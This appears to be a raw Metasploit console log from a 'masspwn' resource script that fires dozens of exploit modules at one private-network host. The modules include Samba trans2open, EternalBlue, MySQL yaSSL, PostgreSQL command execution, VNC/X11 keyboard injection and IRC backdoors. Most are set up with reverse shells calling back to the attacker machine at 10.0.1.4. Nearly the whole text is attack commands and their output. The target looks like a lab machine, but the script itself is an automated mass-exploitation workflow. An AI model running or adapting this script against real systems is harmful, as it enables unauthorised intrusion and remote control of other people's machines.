resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 96.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/osx/samba/trans2open
[*] Started reverse TCP handler on 10.0.1.4:2108
[*] No payload configured, defaulting to osx/ppc/shell/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2109
LPORT => 2109
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 97.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/solaris/samba/trans2open
[*] Started reverse TCP handler on 10.0.1.4:2109
[*] 10.0.1.6:139 - Trying return address 0xbffffdfc...
[*] No payload configured, defaulting to generic/shell_reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2110
LPORT => 2110
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 98.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/samba/trans2open
[*] Started reverse TCP handler on 10.0.1.4:2110
[*] 10.0.1.6:139 - Trying return address 0xffbffaf0...
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2111
LPORT => 2111
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 99.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/samba/chain_reply
[*] Started reverse TCP handler on 10.0.1.4:2111
[*] 10.0.1.6:139 - Trying return address 0xbffffdfc...
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2112
LPORT => 2112
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] 10.0.1.6:139 - Exploit aborted due to failure: no-target: This target is not a vulnerable Samba server (Samba 3.0.20-Debian)
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 100.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/freebsd/samba/trans2open
[*] Started reverse TCP handler on 10.0.1.4:2112
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbffffbfc...
[*] No payload configured, defaulting to bsd/x86/shell/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2113
LPORT => 2113
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 101.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/smb/ms17_010_eternalblue
[*] Started reverse TCP handler on 10.0.1.4:2113
[*] 10.0.1.6:139 - Trying return address 0xbfbffdfc...
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2114
LPORT => 2114
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 102.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/smb/ms09_050_smb2_negotiate_func_index
[*] Started reverse TCP handler on 10.0.1.4:2114
[*] 10.0.1.6:139 - Trying return address 0xffbffa70...
[*] 10.0.1.6:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2115
LPORT => 2115
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
[-] 10.0.1.6:445          - Host does NOT appear vulnerable.
resource (masspwn.2974202.msf)> exploit -j -z
[*] 10.0.1.6:445          - Scanned 1 of 1 hosts (100% complete)
[-] 10.0.1.6:445 - Exploit aborted due to failure: not-vulnerable: Set ForceExploit to override
[*] Exploit running as background job 103.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/misc/windows_rsh
[*] Started reverse TCP handler on 10.0.1.4:2115
[*] 10.0.1.6:445 - Connecting to the target (10.0.1.6:445)...
[*] 10.0.1.6:139 - Trying return address 0xbffff9fc...
[*] 10.0.1.6:445 - Sending the exploit packet (951 bytes)...
[*] 10.0.1.6:445 - Waiting up to 180 seconds for exploit to trigger...
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xbfbffcfc...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2116
LPORT => 2116
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[-] 10.0.1.6:514 - Exploit failed: windows/meterpreter/reverse_tcp: All encoders failed to encode.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/misc/enterasys_netsight_syslog_bof
[*] 10.0.1.6:139 - Trying return address 0xffbff9f0...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2117
LPORT => 2117
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 104.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/misc/java_rmi_server
[*] Started reverse TCP handler on 10.0.1.4:2117
[*] No payload configured, defaulting to java/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
[*] 10.0.1.6:514 - Trying to exploit Enterasys NetSight 4.0.1.34 / Windows 2003 SP2...
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2118
LPORT => 2118
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 105.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/misc/opennms_java_serialize
[*] Started reverse TCP handler on 10.0.1.4:2118
[-] 10.0.1.6:1099 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2119
LPORT => 2119
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
[*] 10.0.1.6:139 - Trying return address 0xbffff7fc...
[*] 10.0.1.6:139 - Trying return address 0xbfbffbfc...
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 106.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/nfs/xlink_nfsd
[*] Started reverse TCP handler on 10.0.1.4:2119
[*] 10.0.1.6:1099 - 10.0.1.6:1099 - Exploting the vulnerable service...
[-] 10.0.1.6:1099 - Exploit failed [bad-config]: Rex::BindFailed The address is already in use or unavailable: (0.0.0.0:8080).
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2120
LPORT => 2120
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 107.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/mysql/mysql_yassl_hello
[*] Started reverse TCP handler on 10.0.1.4:2120
[*] 10.0.1.6:2049 - Trying target Windows 2000 SP4 English...
[*] 10.0.1.6:139 - Trying return address 0xffbff970...
[*] No payload configured, defaulting to generic/shell_reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2121
LPORT => 2121
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 108.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/linux/mysql/mysql_yassl_getname
[*] Started reverse TCP handler on 10.0.1.4:2121
[*] No payload configured, defaulting to linux/x86/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2122
LPORT => 2122
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] 10.0.1.6:3306 - Trying target MySQL 5.0.45-Debian_1ubuntu3.1-log...
[-] The value specified for PAYLOAD is not valid.
[*] 10.0.1.6:139 - Trying return address 0xbfbffafc...
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 109.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/windows/mysql/mysql_yassl_hello
[*] Started reverse TCP handler on 10.0.1.4:2122
[*] 10.0.1.6:139 - Trying return address 0xbffff5fc...
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] 10.0.1.6:139 - Trying return address 0xffbff8f0...
[*] 10.0.1.6:3306 - Server reports version: 5.0.51a-3ubuntu5
[*] 10.0.1.6:3306 - Attempting to locate a corresponding target
[-] 10.0.1.6:3306 - Exploit aborted due to failure: no-target: Unable to detect target automatically
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2123
LPORT => 2123
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 110.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/postgres/postgres_copy_from_program_cmd_exec
[*] Started reverse TCP handler on 10.0.1.4:2123
[*] Using configured payload cmd/unix/reverse_perl
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2124
LPORT => 2124
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
[*] 10.0.1.6:3306 - Trying target MySQL 5.0.45-community-nt...
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 111.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/postgres/postgres_createlang
[*] Started reverse TCP handler on 10.0.1.4:2124
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2125
LPORT => 2125
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 112.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/vnc/vnc_keyboard_exec
[*] Started reverse TCP handler on 10.0.1.4:2125
[*] 10.0.1.6:139 - Trying return address 0xbfbff9fc...
[*] 10.0.1.6:139 - Trying return address 0xffbff870...
[*] 10.0.1.6:139 - Trying return address 0xbffff3fc...
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2126
LPORT => 2126
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] 10.0.1.6:5432 - 10.0.1.6:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] 10.0.1.6:5432 - Exploiting...
[!] 10.0.1.6:5432 - 10.0.1.6:5432 - Unable to execute query: DROP TABLE IF EXISTS 73aGaRJanZk6;
[-] 10.0.1.6:5432 - Exploit Failed
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] 10.0.1.6:139 - Trying return address 0x081ed5f2...
[*] Exploit running as background job 113.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/x11/x11_keyboard_exec
[*] 10.0.1.6:5432 - 10.0.1.6:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Started reverse TCP handler on 10.0.1.4:2126
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2127
[*] 10.0.1.6:5900 - 10.0.1.6:5900 - Bypass authentication
LPORT => 2127
resource (masspwn.2974202.msf)> set ExitOnSession false
[*] 10.0.1.6:5432 - 10.0.1.6:5432 - perl could not be loaded
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] 10.0.1.6:5900 - 10.0.1.6:5900 - Opening Run command
[*] 10.0.1.6:5432 - 10.0.1.6:5432 - python could not be loaded
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] 10.0.1.6:5432 - 10.0.1.6:5432 - python2 could not be loaded
[*] Exploit running as background job 114.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/misc/ra1nx_pubcall_exec
[*] 10.0.1.6:5432 - 10.0.1.6:5432 - python3 could not be loaded
[*] Started reverse TCP handler on 10.0.1.4:2127
[*] 10.0.1.6:6000 - 10.0.1.6:6000 - Register keyboard
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2128
LPORT => 2128
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 115.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/misc/pbot_exec
[*] Started reverse TCP handler on 10.0.1.4:2128
[*] 10.0.1.6:6667 - 10.0.1.6:6667 - Connecting to IRC server...
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2129
LPORT => 2129
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 116.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/misc/xdh_x_exec
[*] Started reverse TCP handler on 10.0.1.4:2129
[*] 10.0.1.6:6667 - 10.0.1.6:6667 - Registering with the IRC Server...
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2130
LPORT => 2130
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 117.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/misc/legend_bot_exec
[*] Started reverse TCP handler on 10.0.1.4:2130
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
[*] 10.0.1.6:6667 - 10.0.1.6:6667 - Registering with the IRC Server...
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2131
LPORT => 2131
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 118.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/multi/misc/w3tw0rk_exec
[*] Started reverse TCP handler on 10.0.1.4:2131
[*] 10.0.1.6:6667 - 10.0.1.6:6667 - Registering with the IRC Server...
[*] No payload configured, defaulting to cmd/unix/reverse_netcat
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
resource (masspwn.2974202.msf)> set LPORT 2132
LPORT => 2132
resource (masspwn.2974202.msf)> set ExitOnSession false
[*] 10.0.1.6:6667 - 10.0.1.6:6667 - Joining the #channel channel...
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] 10.0.1.6:6667 - 10.0.1.6:6667 - Exploiting the malicious IRC bot...
[-] The value specified for PAYLOAD is not valid.
resource (masspwn.2974202.msf)> exploit -j -z
[*] Exploit running as background job 119.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> use exploits/unix/irc/unreal_ircd_3281_backdoor
[*] 10.0.1.6:139 - Trying return address 0xbfbff8fc...
[*] Started reverse TCP handler on 10.0.1.4:2132
resource (masspwn.2974202.msf)> set RHOST 10.0.1.6
RHOST => 10.0.1.6
resource (masspwn.2974202.msf)> set LHOST 10.0.1.4
LHOST => 10.0.1.4
[*] 10.0.1.6:6667 - 10.0.1.6:6667 - Registering with the IRC Server...
resource (masspwn.2974202.msf)> set LPORT 2133
LPORT => 2133
resource (masspwn.2974202.msf)> set ExitOnSession false
ExitOnSession => false
resource (masspwn.2974202.msf)> set PAYLOAD generic_shell_reverse
[*] 10.0.1.6:6667 - 10.0.1.6:6667 - Joining the #channel channel...
[*] 10.0.1.6:6667 - 10.0.1.6:6667 - Exploiting the IRC bot...
[-] The value specified for PAYLOAD is not valid.
[*] 10.0.1.6:139 - Trying return address 0xbffff1fc...
[*] 10.0.1.6:139 - Trying return address 0xffbff7f0...
resource (masspwn.2974202.msf)> exploit -j -z
[-] 10.0.1.6:6667 - Exploit failed: A payload has not been selected.
[*] Exploit completed, but no session was created.
resource (masspwn.2974202.msf)> jobs

Jobs
====

  Id   Name                                                         Payload                            Payload opts
  --   ----                                                         -------                            ------------
  31   Exploit: unix/misc/polycom_hdx_auth_bypass                   cmd/unix/reverse_openssl
  36   Exploit: linux/smtp/apache_james_exec                        linux/x64/meterpreter/reverse_tcp  tcp://10.0.1.4:2042
  81   Exploit: windows/http/disk_pulse_enterprise_bof              windows/meterpreter/reverse_tcp    tcp://10.0.1.4:2093
  88   Exploit: windows/http/xitami_if_mod_since                    windows/meterpreter/reverse_tcp    tcp://10.0.1.4:2100
  96   Exploit: multi/samba/nttrans                                 linux/x86/meterpreter/reverse_tcp  tcp://10.0.1.4:2108
  97   Exploit: osx/samba/trans2open                                osx/ppc/shell/reverse_tcp          tcp://10.0.1.4:2109
  98   Exploit: solaris/samba/trans2open                            generic/shell_reverse_tcp          tcp://10.0.1.4:2110
  100  Exploit: linux/samba/chain_reply                             linux/x86/meterpreter/reverse_tcp  tcp://10.0.1.4:2112
  101  Exploit: freebsd/samba/trans2open                            bsd/x86/shell/reverse_tcp          tcp://10.0.1.4:2113
  103  Exploit: windows/smb/ms09_050_smb2_negotiate_func_index      windows/meterpreter/reverse_tcp    tcp://10.0.1.4:2115
  111  Exploit: multi/postgres/postgres_copy_from_program_cmd_exec  cmd/unix/reverse_perl              tcp://10.0.1.4:2124
  112  Exploit: multi/postgres/postgres_createlang                  cmd/unix/reverse_netcat            tcp://10.0.1.4:2125
  113  Exploit: multi/vnc/vnc_keyboard_exec                         windows/meterpreter/reverse_tcp    tcp://10.0.1.4:2126
  114  Exploit: unix/x11/x11_keyboard_exec                          cmd/unix/reverse_netcat            tcp://10.0.1.4:2127
  115  Exploit: multi/misc/ra1nx_pubcall_exec                       cmd/unix/reverse_netcat            tcp://10.0.1.4:2128
  116  Exploit: multi/misc/pbot_exec                                cmd/unix/reverse_netcat            tcp://10.0.1.4:2129
  117  Exploit: multi/misc/xdh_x_exec                               cmd/unix/reverse_netcat            tcp://10.0.1.4:2130
  118  Exploit: multi/misc/legend_bot_exec                          cmd/unix/reverse_netcat            tcp://10.0.1.4:2131
  119  Exploit: multi/misc/w3tw0rk_exec                             cmd/unix/reverse_netcat            tcp://10.0.1.4:2132

resource (masspwn.2974202.msf)> jobs -K
Stopping all jobs...
[-] 10.0.1.6:6000 - Exploit aborted due to failure: unknown: 10.0.1.6:6000 - X11 initial communication failed
[-] 10.0.1.6:25 - Failed to remove payload message for user '../../../../../../../../etc/cron.d' with password 'sIDOsPUoX'
[-] Error while running command jobs: The connection was refused by the remote host (10.0.1.6:4555).

Call stack:
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/comm/local.rb:298:in `rescue in create_by_type'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/comm/local.rb:263:in `create_by_type'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/comm/local.rb:33:in `create'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket.rb:49:in `create_param'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/tcp.rb:37:in `create_param'
/var/lib/gems/2.7.0/gems/rex-socket-0.1.24/lib/rex/socket/tcp.rb:28:in `create'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit/tcp.rb:106:in `connect'
/home/marshall/Hack/Tools/metasploit-framework/modules/exploits/linux/smtp/apache_james_exec.rb:118:in `execute_james_admin_tool_command'
/home/marshall/Hack/Tools/metasploit-framework/modules/exploits/linux/smtp/apache_james_exec.rb:152:in `cleanup'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:267:in `block in job_cleanup_proc'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:267:in `synchronize'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:267:in `job_cleanup_proc'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/core/exploit_driver.rb:154:in `block in run'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/job.rb:62:in `stop'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/job_container.rb:75:in `stop_job'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:140:in `block (2 levels) in cmd_jobs'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:139:in `each_key'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:139:in `block in cmd_jobs'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:58:in `block (3 levels) in parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:48:in `each_pair'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:48:in `block (2 levels) in parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:47:in `each'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:47:in `block in parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:40:in `each'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:40:in `each_with_index'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/parser/arguments.rb:40:in `parse'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/command_dispatcher/jobs.rb:127:in `cmd_jobs'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:523:in `run_command'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:474:in `block in run_single'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `each'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:468:in `run_single'
/home/marshall/Hack/Tools/metasploit-framework/lib/rex/ui/text/resource.rb:70:in `load_resource'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/driver.rb:187:in `block in initialize'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/driver.rb:186:in `each'
/home/marshall/Hack/Tools/metasploit-framework/lib/msf/ui/console/driver.rb:186:in `initialize'
/home/marshall/Hack/Tools/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `new'
/home/marshall/Hack/Tools/metasploit-framework/lib/metasploit/framework/command/console.rb:62:in `driver'
